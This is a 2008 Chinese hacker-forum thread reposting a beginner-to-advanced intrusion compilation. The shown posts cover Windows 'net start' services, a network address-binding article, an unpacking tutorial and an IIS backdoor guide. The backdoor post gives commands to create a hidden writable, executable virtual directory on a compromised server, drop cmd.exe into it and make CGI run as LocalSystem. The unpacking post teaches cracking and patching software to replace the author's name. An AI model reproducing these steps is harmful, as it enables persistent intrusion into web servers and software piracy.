论坛风格切换
 
  • 帖子
  • 日志
  • 用户
  • 版块
  • 群组
帖子
购买邀请后未收到邀请联系sdbeta@qq.com
  • 105467阅读
  • 68回复

[求助-软件问题]黑客进阶篇——全部认真的看完,不想成为高手都不行 [复制链接]

上一主题 下一主题
离线胡可
 
发帖
*
今日发帖
最后登录
1970-01-01
只看楼主 正序阅读 使用道具 楼主  发表于: 2008-06-14 22:26:29
N多页慢慢看吧,菜鸟晋级之路。
基本技能...................................................................................2楼
黑客初级技术讲解(上)..........................................................3楼
黑客初级技术讲解(中)..........................................................4楼
黑客初级技术讲解(下)..........................................................5楼
基础知识(1)..........................................................................6楼
基础知识(2)..........................................................................7楼
基础知识(3)..........................................................................8楼
基础知识(4)..........................................................................9楼
黑客兵器之木马篇(上)........................................................10楼
黑客兵器之木马篇(下)..................................................... ...11楼
黑客兵器之扫描篇(上).........................................................12楼
黑客兵器之扫描篇(下).........................................................13楼
代理、肉鸡、跳板的概念.........................................................14楼
PHP近期漏洞更新....................................................................15楼
系统进程信息..........................................................................16楼
端口全解析(上)...................................................................17楼
端口全解析(下)...................................................................18楼
端口详细说明表(上)............................................................19楼
端口详细说明表(下)............................................................20楼
木马防范及一些端口的关闭................................................. ...21楼
SSL.TLS.WTLS原理(上).....................................................22楼
SSL.TLS.WTLS原理(下).....................................................23楼
关于MAC地址和IP地址的知识..................................................24楼
术语表(1)............................................................................25楼
术语表(5)............................................................................29楼
网络安全知识(1)...................................................................30楼
........................
网络安全知识(7)...............................................................31楼
防范非系统用户破坏..............................................................32楼
PING命令及使用技巧.............................................................33楼
GHOST详细解说(1)...........................................................34楼
GHOST详细解说(2)...........................................................35楼
GHOST详细解说(3)...........................................................36楼
ipc$详细解说大全(1)..........................................................37楼
..............................
ipc$详细解说大全(5)..........................................................42楼
常见ASP脚本攻击及防范技巧.................................................43楼
开启3389的5种方法(上).....................................................44楼
开启3389的5种方法(下).....................................................45楼
网络常见攻击及防范手册(上)..............................................46楼
网络常见攻击及防范手册(下)..............................................47楼
DOS攻击原理及方法介绍..........................................................48楼
如何突破各种防火墙..................................................................49楼
蠕虫技术(上).........................................................................50楼
蠕虫技术(中)..........................................................................51楼
蠕虫技术(下)........................................................................ ..52楼
壳(上).......................................................................................53楼
壳(下).......................................................................................54楼
浅谈绑定之应用..............................................................................55楼
永远的后门.....................................................................................56楼
入门者如何获得肉鸡.......................................................................57楼
NET START可以起用命令一览表.....................................................58楼

PS:本文由"紫月轩"发于黑客基地,在此表示感谢,全部转完了,虽说不是原创,但也累的不行哦!觉得好的就顶我一个吧!呵呵,谢谢!

[ 本帖最后由 胡可 于 2008-6-14 22:53 编辑 ]
离线lacoucou
发帖
*
今日发帖
最后登录
1970-01-01
只看该作者 68 发表于: 2010-04-06 12:38:02
为啥不搞成电子书啊?
离线ever__f
发帖
*
今日发帖
最后登录
1970-01-01
只看该作者 67 发表于: 2010-04-04 18:28:51
楼主你太强了,向你敬礼
离线singa
发帖
*
今日发帖
最后登录
1970-01-01
只看该作者 66 发表于: 2010-04-04 18:07:12
楼主真是一个高手啊,谢谢分享!
离线yangxiongdi

发帖
321
今日发帖
最后登录
2021-06-20
只看该作者 65 发表于: 2008-10-08 22:03:42
不错,收下慢慢看,一个一个看完好累啊
发帖
*
今日发帖
最后登录
1970-01-01
只看该作者 64 发表于: 2008-07-04 17:09:21
原帖由 极光 于 2008-7-4 16:45 发表
我现在用KIS8了,没报
可能是有些代码造成的

呵呵,可能吧~~
有什么情况可以PM我,我到时修改帖子吧~~
离线极光
发帖
*
今日发帖
最后登录
1970-01-01
只看该作者 63 发表于: 2008-07-04 16:45:53
我现在用KIS8了,没报

可能是有些代码造成的
发帖
*
今日发帖
最后登录
1970-01-01
只看该作者 62 发表于: 2008-07-04 14:10:41
原帖由 极光 于 2008-6-20 14:25 发表
本页面ESS报毒
就这个页面?我的没报啊..
离线极光
发帖
*
今日发帖
最后登录
1970-01-01
只看该作者 61 发表于: 2008-06-20 14:25:56
本页面ESS报毒
离线极光
发帖
*
今日发帖
最后登录
1970-01-01
只看该作者 60 发表于: 2008-06-20 14:25:01
:84) 谢谢楼主 ,慢慢看
发帖
*
今日发帖
最后登录
1970-01-01
只看该作者 59 发表于: 2008-06-18 12:23:24
原来是黑基过来的·~呵呵,很全的~~
离线胡可
发帖
*
今日发帖
最后登录
1970-01-01
只看该作者 58 发表于: 2008-06-14 22:52:00
哎!不容易啊!终于转完了,幸好没有防灌水的机制 !!累个半死!版主给加点WW让我早日成为正式会员哦!
离线胡可
发帖
*
今日发帖
最后登录
1970-01-01
只看该作者 57 发表于: 2008-06-14 22:50:44
NET START可以起用命令一览表

Net start
启动服务,或显示已启动服务的列表。两个或多个词组成的服务名,例如 Net Logon 或 Co
mputer Browser,必须两边加引号 (")。
net start [service]
参数

键入不带参数的 net start 显示正在运行服务的列表。
service
包括 alerter、client service for netware、clipbook server、content index、comput
er browser、dhcp client、directory replicator、eventlog、ftp publishing service、
hypermedia object manager、logical disk manager、lpdsvc、media services managemen
t, messenger、Fax Service、Microsoft install server、net logon、network dde、netw
ork dde dsdm、nt lm security support provider、ole、plug and play、remote access
connection manager、remote access isnsap service、remote access server、remote pr
ocedure call (rpc) locator、remote procedure call (rpc) service、schedule、server
、simple tcp/ip services、site server ldap service、smartcard resource manager、s
nmp、spooler、task scheduler、tcp/ip netbios helper、telephony service、tracking
service、tracking (server) service、ups、Windows time service 和 workstation。
下面服务只有在 Windows 2000 上可用:file service for macintosh、gateway service
for netware、microsoft dhcp service、print service for macintosh、windows interne
t name service。

Net start Alerter
启动“警报器”服务。“警报器”服务发送警告消息。
Net start Alerter
Net start Client Service for NetWare
启动“NetWare 客户服务”。该命令只有在安装了 NetWare 客户服务的情况下才能在 Wind
ows 2000 Professional 上使用。
net start "client service for netware"
Net start ClipBook Server
启动“剪贴簿服务器”服务。两个单词组成的服务名,例如 ClipBook Server,必须两边加
引号 (")。
net start "clipbook server"

Net start Computer Browser
启动“计算机浏览器”服务。
net start "computer browser"

Net start DHCP Client
启动“DHCP 客户”服务。该命令只有在安装了 TCP/IP 协议之后才可用。
net start "dhcp client"

Net start Directory Replicator
启动“目录复制程序”服务。“目录复制程序”服务将指定的文件复制到指定服务器上。两
个词组成的服务名,例如 Directory Replicator,必须两边加引号 (")。也可以用命令 net
start replicator 启动该服务。
net start "directory replicator"

Net start Eventlog
启动“事件日志”服务,该服务将事件记录在本地计算机上。必须在使用事件查看器查看记
录的事件之前启动该服务。
net start Eventlog

Net start File Server for Macintosh
启动 Macintosh 文件服务,允许 Macintosh 计算机使用共享文件。该命令只能在运行 Win
dows 2000 Server 的计算机上可用。
net start "file service for macintosh"
Net start FTP Publishing Service
启动 FTP 发布服务。该命令只有在安装了 Internet 信息服务后才可用。
net start "ftp publishing service"
Net start Gateway Service for NetWare
启动 NetWare 网关服务。该命令只有在安装了 NetWare 网关服务的情况下才能在 Windows
2000 Server 上可用。
net start "gateway service for netware"
Net start Lpdsvc
启动 TCP/IP 打印服务器服务。该命令只有在 UNIX 打印服务和 TCP/IP 协议安装后方可使
用。
net start lpdsvc

Net start Messenger
启动“信使”服务。“信使”服务允许计算机接收邮件。
net start messenger

Net start Microsoft DHCP Service
启动 Microsoft DHCP 服务。该命令只有在运行 Windows 2000 Server 并且已安装 TCP/IP
协议和 DHCP 服务的情况下才可用。
net start "microsoft dhcp service"

Net start Net Logon
启动“网络登录”服务。“网络登录”服务验证登录请求并控制复制用户帐户数据库域宽。
两个词组成的服务名,例如 Net Logon,必须两边加引号 (")。该服务也可以使用命令 net
start netlogon 启动。
net start "net logon"

Net start Network DDE
启动“网络 DDE”服务。
net start "network dde"
Net start NT LM Security Support Provider
启动“NT LM 安全支持提供程序”服务。该命令只有在安装了“NT LM 安全支持提供程序”
后才可用。
net start "nt lm security support provider"
Net start OLE
启动对象链接和嵌入服务。
net start ole
Net start Print Server for Macintosh
启动 Macintosh 打印服务器服务,允许从 Macintosh 计算机打印。该命令只能在运行 Win
dows 2000 Server 的计算机上可用。
net start "print server for macintosh"
Net start Remote Access Connection Manager
启动“远程访问连接管理器”服务。该命令只有在安装了“远程访问服务”后才可用。
net start "remote access connection manager"
Net start Remote Access ISNSAP Service
启动“远程访问 ISNSAP 服务”。该命令只有在安装了“远程访问服务”后才可用。
net start "remote access isnsap service"
Net start Remote Procedure Call (RPC) Locator
启动 RPC 定位器服务。“定位器”服务是 Microsoft Windows 2000 的 RPC 名称服务。
net start "remote procedure call (rpc) locator"

Net start Remote Procedure Call (RPC) Service
启动“远程过程调用 (RPC) 服务”。“远程过程调用 (RPC) 服务”是 Microsoft Windows
2000 的 RPC 子系统。RPC 子系统包括终结点映射器和其他各种 RPC 服务。
net start "remote procedure call (rpc) service"

Net start Schedule
启动“计划”服务。“计划”服务使计算机可以使用 at 命令在指定时间启动程序。
net start schedule

Net start Server
启动“服务器”服务。“服务器”服务使计算机可以共享网络上的资源。
net start server

Net start Simple TCP/IP Services
启动“简单 TCP/IP 服务”服务。该命令只有在安装了 TCP/IP 和“简单 TCP/IP 服务”后
才可以使用。
net start "simple tcp/ip services"
Net start Site Server LDAP Service
启动“Site Server LDAP 服务”。“Site Server LDAP 服务”在 Windows 2000 Active D
irectory 中发布 IP 多播会议。该命令只有在安装了“Site Server LDAP 服务”后才可以使
用。
net start "site server ldap service"

Net start SNMP
启动 SNMP 服务。SNMP 服务允许服务器向 TCP/IP 网络上的 SNMP 管理系统报告当前状态。
该命令只有在安装了 TCP/IP 和 SNMP 后才可以使用。
net start snmp

Net start Spooler
启动“后台打印程序”。
net start spooler
Net start TCP/IP NetBIOS Helper
在 TCP 服务上启用 Netbios 支持。该命令只有在安装了 TCP/IP 才可用。
net start "tcp/ip netbios helper"
Net start UPS
启动“不间断电源 (UPS)”服务
net start ups

Net start Windows Internet Name Service
启动“Windows Internet 命名服务”。该命令只有在安装了 TCP/IP 和“Windows Interne
t 命名服务”后在 Windows 2000 Servers 上才可以使用。
net start "windows internet name service"

Net start Workstation
启动“工作站”服务。“工作站”服务使计算机可以连接并使用网络资源。
net start workstation
Net start Schedule
有的地方称为“定时”服务,叫法不同,请大家注意了,其实是一回事!
Net start Telnet
启动telnet服务,打开23端口,有的情况下需先运行NTLM.exe。为什么?到榕G的说明里去找
吧!
net start workstation
打开NET USE
net start lanmanserver
打开 IPC 服务。
开FTP命令是:net start msftpsvc
Net start
启动服务,或显示已启动服务的列表。两个或多个词组成的服务名,例如 Net Logon 或 Co
mputer Browser,必须两边加引号 (")。
net start [service]
参数

键入不带参数的 net start 显示正在运行服务的列表。
service
包括 alerter、client service for netware、clipbook server、content index、comput
er browser、dhcp client、directory replicator、eventlog、ftp publishing service、
hypermedia object manager、logical disk manager、lpdsvc、media services managemen
t, messenger、Fax Service、Microsoft install server、net logon、network dde、netw
ork dde dsdm、nt lm security support provider、ole、plug and play、remote access
connection manager、remote access isnsap service、remote access server、remote pr
ocedure call (rpc) locator、remote procedure call (rpc) service、schedule、server
、simple tcp/ip services、site server ldap service、smartcard resource manager、s
nmp、spooler、task scheduler、tcp/ip netbios helper、telephony service、tracking
service、tracking (server) service、ups、Windows time service 和 workstation。
下面服务只有在 Windows 2000 上可用:file service for macintosh、gateway service
for netware、microsoft dhcp service、print service for macintosh、windows interne
t name service。

Net start Alerter
启动“警报器”服务。“警报器”服务发送警告消息。
Net start Alerter
Net start Client Service for NetWare
启动“NetWare 客户服务”。该命令只有在安装了 NetWare 客户服务的情况下才能在 Wind
ows 2000 Professional 上使用。
net start "client service for netware"
Net start ClipBook Server
启动“剪贴簿服务器”服务。两个单词组成的服务名,例如 ClipBook Server,必须两边加
引号 (")。
net start "clipbook server"

Net start Computer Browser
启动“计算机浏览器”服务。
net start "computer browser"
离线胡可
发帖
*
今日发帖
最后登录
1970-01-01
只看该作者 56 发表于: 2008-06-14 22:50:16
永远的后门

IIS是比较流行的www服务器,设置不当漏洞就很多。入侵iis服务器后留下后门,以后就可以随时控制。一般的后门程序都是打开一个特殊的端口来监听,比如有nc,ntlm,rnc等等都是以一种类telnet的方式在服务器端监听远程的连接控制。不过一个比较防范严密的www站点(他们的管理员吃了苦头后)一般通过防火墙对端口进行限制,这样除了管理员开的端口外,其他端口就不能连接了。但是80端口是不可能关闭的(如果管理员没有吃错药)。那么我们可以通过在80端口留后门,来开启永远的后门。


如果你对此有情趣,跟我来...........
当IIS启动CGI应用程序时,缺省用CreateProcessAsUser API来创建该CGI的新Process,该程序的安全上下文就由启动该CGI的用户决定。一般匿名用户都映射到IUSR_computername这个账号,当然可以由管理员改为其他的用户。或者由浏览器提供一个合法的用户。两者的用户的权限都是比较低,可能都属于guest组的成员。其实我们可以修改 iis开启CGI的方式,来提高权限。我们来看iis主进程本身是运行在localsystem账号下的,所以我们就可以得到最高localsystem 的权限。
入侵web服务器后,一般都可以绑定一个cmd到一个端口来远程控制该服务器。这时可以有GUI的远程控制,比如3389,或者类telnet text方式的控制,比如rnc。nc肯定是可以用的,其实这也足够了。
1. telnet到服务器

2. cscript.exe adsutil.vbs enum w3svc/1/root
KeyType : (STRING) "IIsWebVirtualDir"
AppRoot : (STRING) "/LM/W3SVC/1/ROOT"
AppFriendlyName : (STRING) "默认应用程序"
AppIsolated : (INTEGER) 2
AccessRead : (BOOLEAN) True
AccessWrite : (BOOLEAN) False
AccessExecute : (BOOLEAN) False
Accessscript : (BOOLEAN) True
AccessSource : (BOOLEAN) False
AccessNoRemoteRead : (BOOLEAN) False
AccessNoRemoteWrite : (BOOLEAN) False
AccessNoRemoteExecute : (BOOLEAN) False
AccessNoRemotescript : (BOOLEAN) False
HttpErrors : (LIST) (32 Items)
"400,*,FILE,C:\WINNT\help\iisHelp\common\400.htm"
"401,1,FILE,C:\WINNT\help\iisHelp\common\401-1.htm"
"401,2,FILE,C:\WINNT\help\iisHelp\common\401-2.htm"
"401,3,FILE,C:\WINNT\help\iisHelp\common\401-3.htm"
"401,4,FILE,C:\WINNT\help\iisHelp\common\401-4.htm"
"401,5,FILE,C:\WINNT\help\iisHelp\common\401-5.htm"
"403,1,FILE,C:\WINNT\help\iisHelp\common\403-1.htm"
"403,2,FILE,C:\WINNT\help\iisHelp\common\403-2.htm"
"403,3,FILE,C:\WINNT\help\iisHelp\common\403-3.htm"
"403,4,FILE,C:\WINNT\help\iisHelp\common\403-4.htm"
"403,5,FILE,C:\WINNT\help\iisHelp\common\403-5.htm"
"403,6,FILE,C:\WINNT\help\iisHelp\common\403-6.htm"
"403,7,FILE,C:\WINNT\help\iisHelp\common\403-7.htm"
"403,8,FILE,C:\WINNT\help\iisHelp\common\403-8.htm"
"403,9,FILE,C:\WINNT\help\iisHelp\common\403-9.htm"
"403,10,FILE,C:\WINNT\help\iisHelp\common\403-10.htm"
"403,11,FILE,C:\WINNT\help\iisHelp\common\403-11.htm"
"403,12,FILE,C:\WINNT\help\iisHelp\common\403-12.htm"
"403,13,FILE,C:\WINNT\help\iisHelp\common\403-13.htm"
"403,15,FILE,C:\WINNT\help\iisHelp\common\403-15.htm"
"403,16,FILE,C:\WINNT\help\iisHelp\common\403-16.htm"
"403,17,FILE,C:\WINNT\help\iisHelp\common\403-17.htm"
"404,*,FILE,C:\WINNT\help\iisHelp\common\404b.htm"
"405,*,FILE,C:\WINNT\help\iisHelp\common\405.htm"
"406,*,FILE,C:\WINNT\help\iisHelp\common\406.htm"
"407,*,FILE,C:\WINNT\help\iisHelp\common\407.htm"
"412,*,FILE,C:\WINNT\help\iisHelp\common\412.htm"
"414,*,FILE,C:\WINNT\help\iisHelp\common\414.htm"
"500,12,FILE,C:\WINNT\help\iisHelp\common\500-12.htm"
"500,13,FILE,C:\WINNT\help\iisHelp\common\500-13.htm"
"500,15,FILE,C:\WINNT\help\iisHelp\common\500-15.htm"
"500,100,URL,/iisHelp/common/500-100.asp"

FrontPageWeb : (BOOLEAN) True
Path : (STRING) "c:\inetpub\wwwroot"
AccessFlags : (INTEGER) 513
[/w3svc/1/root/localstart.asp]
[/w3svc/1/root/_vti_pvt]
[/w3svc/1/root/_vti_log]
[/w3svc/1/root/_private]
[/w3svc/1/root/_vti_txt]
[/w3svc/1/root/_vti_script]
[/w3svc/1/root/_vti_cnf]
[/w3svc/1/root/_vti_bin]
不要告诉我你不知道上面的输出是什么!!!!
现在我们心里已经有底了,是不是!呵呵 管理员要倒霉了

3. mkdir c:\inetpub\wwwroot\dir1
4. cscript.exe mkwebdir.vbs -c MyComputer -w "Default Web Site" -v "Virtual Dir1","c:\inetpub\wwwroot\dir1"
这样就建好了一个虚目录:Virtual Dir1
你可以用 1 的命令看一下
5. 接下来要改变一下Virtual Dir1的属性为execute
cscript.exe adsutil.vbs set w3svc/1/root/Virtual Dir1/accesswrite "true" -s:
cscript.exe adsutil.vbs set w3svc/1/root/Virtual Dir1/accessexecute "true" -s:
现在你已经可以upload 内容到该目录,并且可以运行。你也可以把cmd.exe net.exe直接拷贝到虚拟目录的磁盘目录中。

6. 以下命令通过修改iis metabase 来迫使iis以本身的安全环境来创建新的CGI process

Cscript adsutil.vbs set /w3svc/1/root/[your directory]/createprocessasuser false


注释:cscript windows script host.

adsutil.vbs windows iis administration script

后面是 iis metabase path


这样的后门几乎是无法查出来的,除非把所有的虚目录察看一遍(如果管理员写好了遗书,那他就去查吧)

大家不可以用来做非法的攻击,一切后果自负
离线胡可
发帖
*
今日发帖
最后登录
1970-01-01
只看该作者 55 发表于: 2008-06-14 22:49:54
目前以太网已经普遍应用于运营领域,如小区接入、校园网等等。但由于以太网本身的开放性、共享性和弱管理性,采用以太网接入在用户管理和安全管理上必然存在诸多隐患。业界厂商都在寻找相应的解决方案以适应市场需求,绑定是目前普遍宣传和被应用的功能,如常见的端口绑定、MAC绑定、IP绑定、动态绑定、静态绑定等。其根本目的是要实现用户的唯一性确定,从而实现对以太网用户的管理。

  一、绑定的由来

  绑定的英文词是BINDING,其含义是将两个或多个实体强制性的关联在一起。一个大家比较熟悉的例子,就是配置网卡时,将网络协议与网卡驱动绑定在一起。其实在接入认证时,匹配用户名和密码,也是一种绑定,只有用户名存在并且密码匹配成功,才认为是合法用户。在这里,用户名已经可以唯一标识某个用户,与对应密码进行一一绑定。

  二、绑定的分类

  从绑定的实现机制上,可以分为AAA(服务器)有关绑定和AAA无关绑定;从绑定的时机上,可以分为静态绑定和动态绑定。

  AAA是用户信息数据库,所以AAA有关绑定以用户信息为核心,认证时设备上传绑定的相关属性(端口、VLAN、MAC、IP等),AAA收到后与本地保存的用户信息匹配,匹配成功则允许用户上网,否则拒绝上网请求。

  AAA无关绑定完全由接入设备实现。接入设备(如Lanswitch)上没有用户信息,所以AAA无关绑定只能以端口为核心,在端口上可以配置本端口可以接入的MAC(或IP)地址列表,只有其MAC地址属于此列表中的计算机才能够从该端口接入网络。

  静态绑定是在用户接入网络前静态配置绑定的相关信息,用户接入认证时,匹配这些信息,只有匹配成功才能接入。

  动态绑定的相关信息不是静态配置的,而是接入时才动态保存到接入设备上,接入网络后不允许用户再修改这些信息,一旦修改,则强制用户下线。

  AAA相关绑定一般都是静态绑定,动态绑定一般都是在接入设备上实现的。接入设备离最终用户最近,用户所有的认证数据流和业务数据流都必须经过接入设备,只有认证数据流经过AAA,所以接入设备可以最容易最及时发现相关绑定信息的变化,也方便采取强制用户下线等处理措施。另外,网络中AAA一般只有一台,集中管理,接入设备却有很多,由分散的接入设备监视用户绑定信息的变化,可以减轻AAA的负担。

  三、绑定的应用模式

  除了常用的用户名与密码绑定外,可以用于绑定的属性主要有:端口、VLAN、MAC地址和IP地址。这些属性的特性不同,其绑定的应用模式也有较大差别。

  1、IP地址绑定

  1)解释

  按照前边的定义标准,IP地址绑定可以分为AAA有关IP地址绑定、AAA无关IP地址绑定、IP地址静态绑定和IP地址动态绑定。

  AAA有关IP地址绑定:在AAA上保存用户固定分配的IP地址,用户认证时,接入设备上传用户机器静态配置的IP地址,AAA将设备上传IP地址与本地保存IP地址比较,只有相等才允许接入。

  AAA无关IP地址绑定:在接入设备上配置某个端口只能允许哪些IP地址接入,一个端口可以对应一个IP地址,也可以对应多个,用户访问网络时,只有源IP地址在允许的范围内,才可以接入。

  IP地址静态绑定:接入网络时检查用户的IP地址是否合法。

  IP地址动态绑定:用户上网过程中,如更改了自己的IP地址,接入设备能够获取到,并禁止用户继续上网






2)应用

  教育网中,学生经常改变自己的IP地址,学校里IP地址冲突的问题比较严重,各学校网络中心承受的压力很大,迫切需要限制学生不能随便更改IP地址。可以采用以下方法做到用户名和IP地址的一一对应,解决IP地址问题。

  如有DHCP Server,可以使用IP地址动态绑定,限制用户上网过程中更改IP地址。此时需要接入设备限制用户只能通过DHCP获取IP地址,静态配置的IP地址无效。如没有DHCP Server,可以使用AAA有关IP地址绑定和IP地址动态绑定相结合方式,限制用户只能使用固定IP地址接入,接入后不允许用户再修改IP地址。通过 DHCP Server分配IP地址时,一般都可以为某个MAC地址分配固定的IP地址,再与AAA有关MAC地址绑定配合,变相的做到了用户和IP地址的一一对应。

  2、MAC地址绑定

  1)解释

  与IP地址绑定类似,MAC地址绑定也可以分为AAA有关MAC地址绑定和AAA无关MAC地址绑定;MAC地址静态绑定和MAC地址动态绑定。

  由于修改了MAC地址之后,必须重新启动网卡才能有效,重新启动网卡就意味着重新认证,所以MAC地址动态绑定意义不大。

  2)应用

  AAA有关MAC地址绑定在政务网或园区网中应用比较多,将用户名与机器网卡的MAC地址绑定起来,限制用户只能在固定的机器上上网,主要是为了安全和防止帐号盗用。但由于MAC地址也是可以修改的,所以这个方法还存在一些漏洞的。

  3、端口绑定

  1)解释

  端口的相关信息包含接入设备的IP地址和端口号。

  设备IP和端口号对最终用户都是不可见的,最终用户也无法修改端口信息,用户更换端口后,一般都需要重新认证,所以端口动态绑定的意义不大。由于AAA无关绑定是以端口为核心了,所以AAA无关端口绑定也没有意义。

  有意义的端口绑定主要是AAA有关端口绑定和端口静态绑定。

  2)应用

  AAA有关端口绑定主要用于政务网、园区网和运营商网络,从而限制用户只能在特定的端口上接入。

  4、VLAN绑定

  1)解释

  与端口绑定类似,VLAN相关信息也配置在接入设备上,最终用户无法修改,所以,VLAN动态绑定意义不大。对于AAA无关VLAN绑定,如只将端口与VLAN ID绑定在一起,那么如果用户自己连一个HUB,就会出现一旦此HUB上的一个用户认证通过,其他用户也可以上网的情况,造成网络接入不可控,所以一般不会单独使用AAA无关的VLAN绑定。

  常用的VLAN绑定是AAA有关VLAN绑定和VLAN静态绑定。





 2)应用

  如网络接入采用二层结构,上层是三层交换机,下层是二层交换机,认证点在三层交换机上,这种情况下,仅靠端口绑定只能限制用户所属的三层交换机端口,限制范围太大,无法限制用户所属的二层交换机端口。

  使用AAA有关VLAN绑定和VLAN静态绑定就可以解决这个问题。

  分别为二层交换机的每个下行端口各自设置不同的VLAN ID,二层交换机上行端口设置为VLAN透传,就产生了一个三层交换机端口对应多个VLAN ID的情况,每个VLAN ID对应一个二层交换机的端口。用户认证时,三层交换机将VLAN信息上传到AAA,AAA与预先设置的信息匹配,根据匹配成功与否决定是否允许用户接入。

  此外,用户认证时,可以由AAA将用户所属的VLAN ID随认证响应报文下发到接入设备,这是另外一个角度的功能。虽然无法限制用户只能通过特定的二层交换机端口上网,但是可以限制用户无论从那个端口接入,使用的都是用一个VLAN ID。这样做的意义在于,一般的DHCP Server都可以根据VLAN划分地址池,用户无论在哪个位置上网,都会从相同的地址池中分配IP地址。出口路由器上可以根据源IP地址制定相应的访问权限。综合所有这些,变相的实现了在出口路由器上根据用户名制定访问权限的功能。

  5、其它说明

  标准的802.1x认证,只能控制接入端口的打开和关闭,如某个端口下挂了一个HUB,则只要HUB上有一个用户认证通过,该端口就处于打开状态,此 HUB下的其他用户也都可以上网。为了解决这个问题,出现了基于MAC地址的认证,某个用户认证通过后,接入设备就将此用户的MAC地址记录下来,接入设备只允许所记录MAC地址发送的报文通过,其它MAC地址的报文一律拒绝。

  为了提高安全性,接入设备除了记录用户的MAC地址外,还记录了用户的IP地址、VLAN ID等,收到的报文中,只要MAC地址、IP地址和VLAN ID任何一个与接入设备上保存的信息匹配不上,就不允许此报文通过。有的场合,也将这种方式称为接入设备的“MAC地址+IP地址+VLAN ID”绑定功能。功能上与前边的AAA无关的动态绑定比较类似,只是用途和目的不同。

  四、业界厂商产品对绑定的支持

  以上的常用绑定功能业界厂商都普遍支持,一些厂商还进行了更有特色的功能开发,如华为提供的以下增强功能:

  1、绑定信息自学习

  1)MAC地址自动学习

  配置AAA相关MAC地址绑定功能时,MAC很长,难以记忆,输入时也经常出错,一旦MAC地址输入错误,就会造成用户无法上网,大大增加了AAA系统管理员的工作量。CAMS实现了MAC地址自动学习功能,可以学习用户第一次上网的MAC地址,并自动与用户绑定,既减少了工作量,又不会出错。以后用户MAC地址变更时,系统管理员将用户绑定的MAC地址清空,CAMS会再次自动学习用户MAC地址。

  2)IP地址自动学习

  与MAC地址自动学习类似。

  2、一对多绑定

  1)IP地址一对多绑定

  用户可以绑定不只一个IP地址,而是可以绑定一个连续的地址段。这个功能主要应用于校园网中,一个教研室一般都会分配一个连续的地址段,教研室的每个用户都可以自由使用该地址段中的任何一个IP地址。教研室内部的网络结构和IP地址经常变化,将用户和教研室的整个地址段绑定后,可以由各教研室自己分配和管理内部IP地址,既不会因教研室内部IP地址分配问题影响整个校园网的正常运转,又可以大大减少AAA系统管理员的工作量。

  2)端口一对多绑定

  与IP地址一对多绑定类似,也存在端口一对多绑定的问题。CAMS将端口信息分成以下几个部分:接入设备IP地址-槽号-子槽号-端口号-VLAN ID,这几个部分按照范围由广到窄的顺序。任何一个部分都可以使用通配符,表示不限制具体数值。比如,端口号部分输入通配符,就表示将用户绑定在某台交换机下的某个槽号的某个子槽号的所有端口上,可以从其中的任何一个端口接入。
离线胡可
发帖
*
今日发帖
最后登录
1970-01-01
只看该作者 54 发表于: 2008-06-14 22:49:05
壳(下)

二.加壳软件
最常见的加壳软件ASPACK ,UPX,PEcompact
不常用的加壳软件WWPACK32;PE-PACK ;PETITE ;NEOLITE

三.侦测壳和软件所用编写语言的软件
1.侦测壳的软件fileinfo.exe 简称fi.exe(侦测壳的能力极强)使用方法:

第一种:待侦测壳的软件(如aa.exe)和fi.exe位于同一目录下,执行
windows起始菜单的运行,键入fi aa

第二种:待侦测壳的软件(如aa.exe)和fi.exe位于同一目录下,将aa的图标拖到fi的图标上

2.侦测壳和软件所用编写语言的软件language.exe(两个功能合为一体,很棒)?犕萍鰈anguage2000中文版,我的

主页可下载傻瓜式软件,运行后选取待侦测壳的软件即可(open)

3.软件常用编写语言Delphi,VisualBasic(VB)---最难破,VisualC(VC)


脱壳

拿到一个软件,我们首先根据第一课的内容。侦测它的壳,然后我们要把它的壳脱去,还原它的本来面目.若它没有加壳,就省事不用脱壳了.

一.脱壳软件
unaspack,caspr,upx,unpecompact,procdump
二.使用方法
(一)aspack壳 脱壳可用unaspack或caspr
1.unaspack?犖业闹饕晨上略刂形陌?
使用方法类似lanuage
傻瓜式软件,运行后选取待脱壳的软件即可.?犎钡悖褐荒芡補spack早些时候版本的壳,不能脱高版本的壳
2.caspr
第一种:待脱壳的软件(如aa.exe)和caspr.exe位于同一目录下,执行
windows起始菜单的运行,键入 caspr aa.exe
脱壳后的文件为aa.ex_,删掉原来的aa.exe,将aa.ex_改名为aa.exe即可
使用方法类似fi?犛诺悖嚎梢酝補spack任何版本的壳,脱壳能力极强 缺点:Dos界面
第二种:将aa.exe的图标拖到caspr.exe的图标上
***若已侦测出是aspack壳,用unaspack脱壳出错,说明是aspack高版本的壳,用caspr脱即可

(二)upx壳 脱壳可用upx
待脱壳的软件(如aa.exe)和upx.exe位于同一目录下,执行windows起始菜单的运行,键入upx -d aa.exe

(三)PEcompact壳 脱壳用unpecompact
使用方法类似lanuage。傻瓜式软件,运行后选取待脱壳的软件即可

(四)procdump 万能脱壳但不精,一般不要用 我的主页可下载中文版
使用方法:运行后,先指定壳的名称,再选定欲脱壳软件,确定即可
脱壳后的文件大于原文件。由于脱壳软件很成熟,手动脱壳一般用不到,不作介绍.

三. exe可执行文件编辑软件ultraedit
下载它的汉化版本,它的注册机可从网上搜到
ultraedit打开一个中文软件,若加壳,许多汉字不能被认出
ultraedit打开一个中文软件,若未加壳或已经脱壳,许多汉字能被认出
ultraedit可用来检验壳是否脱掉,以后它的用处还很多,请熟练掌握
例如,可用它的替换功能替换作者的姓名为你的姓名
注意字节必须相等,两个汉字替两个,三个替三个,不足处在ultraedit编辑器左边用00补
离线胡可
发帖
*
今日发帖
最后登录
1970-01-01
只看该作者 53 发表于: 2008-06-14 22:48:50
壳(上)

首先我想大家应该先明白“壳”的概念。在自然界中,我想大家对壳这东西应该都不会陌生了,植物用它来保护种子,动物用它来保护身体等等。同样,在一些计算机软件里也有一段专门负责保护软件不被非法修改或反编译的程序。它们一般都是先于程序运行,拿到控制权,然后完成它们保护软件的任务。就像动植物的壳一般都是在身体外面一样理所当然(但后来也出现了所谓的“壳中带籽”的壳)。由于这段程序和自然界的壳在功能上有很多相同的地方,基于命名的规则,大家就把这样的程序称为“壳”了。就像计算机病毒和自然界的病毒一样,其实都是命名上的方法罢了。

